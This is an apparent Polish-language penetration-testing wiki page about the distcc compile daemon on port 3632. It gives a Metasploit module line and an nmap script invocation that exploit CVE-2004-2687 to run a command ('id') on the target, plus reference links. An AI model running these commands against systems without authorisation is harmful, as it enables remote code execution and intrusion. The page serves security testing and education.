{{#include ../banners/hacktricks-training.md}} # Podstawowe informacje **Distcc** to narzędzie, które poprawia **proces kompilacji**, wykorzystując **nieużywaną moc obliczeniową** innych komputerów w sieci. Gdy **distcc** jest skonfigurowany na maszynie, ta maszyna jest w stanie rozdzielać swoje **zadania kompilacji** do innego systemu. Ten system odbierający musi mieć uruchomiony **demon distccd** i musi mieć zainstalowany **kompatybilny kompilator**, aby przetworzyć wysłany kod. **Domyślny port:** 3632 ``` PORT STATE SERVICE 3632/tcp open distccd ``` # Wykorzystanie Sprawdź, czy jest podatny na **CVE-2004-2687**, aby wykonać dowolny kod: ```bash msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` # Shodan _Nie sądzę, żeby shodan wykrywał tę usługę._ # Resources - [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec) - [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) Post stworzony przez **Álex B (@r1p)** {{#include ../banners/hacktricks-training.md}}